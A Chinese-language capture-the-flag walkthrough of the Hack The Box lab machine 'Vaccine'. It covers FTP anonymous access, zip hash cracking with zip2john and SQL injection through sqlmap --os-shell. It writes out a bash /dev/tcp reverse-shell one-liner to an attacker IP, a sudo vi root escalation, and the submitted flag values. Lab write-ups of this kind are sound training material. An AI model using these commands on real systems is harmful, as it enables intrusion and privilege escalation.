---

靶机：Vaccine

Task1

问题：除了SSH和HTTP，这个盒子上还托管了什么服务？

ftp

nmap扫一下

Task2

问题：此服务可以配置为允许使用特定用户名的任何密码登录。那个用户名是什么？

anonymous

直接空密码登录

Task3

问题：通过此服务下载的文件的名称是什么？

backup.zip

Task4

问题：John the Ripper工具集附带了什么脚本，并以允许破解尝试的格式从受密码保护的zip档案中生成哈希？

zip2john

解压zip时发现有加密，运用工具破解加密的zip中生成哈希

zip2john backup.zip > hashs

再拿字典跑一下得到密码

Task5

问题：网站上管理员用户的密码是什么？

qwerty789

拿到密码解压zip后，在index.php找到MD5加密的
解密一下即可

参考前一关

Task6

问题：什么选项可以传递给sqlmap以尝试通过sql注入来执行命令？

--os-shell

7-9解题过程

我们使用--os-shell进行反弹shell

bash -c "bash -i >& /dev/tcp/10.10.14.212/443 0>&1"

先开启nc监听，然后跑sqlmap输入命令
然后cat /var/www/html/dashboard.php找到密码

当然密码可以用sqlmap爆破出来

sqlmap -u "http://10.129.237.178/dashboard.php?search=1" --cookie "PHPSESSID=ag8on0evhpqu5cgtsr3dbrfget" --users --password --level=3

然后去掉md5，解密一下得到

知道密码后我们直接ssh连接

然后我们想查看下权限

sudo -l

利用刚刚得到的密码登录，发现能用的有一个配置文件

那么我们去搜一下vi的提权命令
这里可以用(b)的，通过修改配置文件pg_hba.conf写入shell

sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf

然后进入vim编辑器，输入a添加下面命令

:set shell=/bin/sh

然后esc，输入:wq
退出后再次进入配置的文件，直接输入:，继续输入shell即可
我们可以发现用户变为root
先得到user.txt

即可访问root.txt

Task7

问题：postgres用户可以使用sudo作为root用户运行什么程序？

vi

Submit user flag

ec9b13ca4d6229cd5cc1e09980965bf7

Submit root flag

dd6e058e814260bc70e9bbdef2715849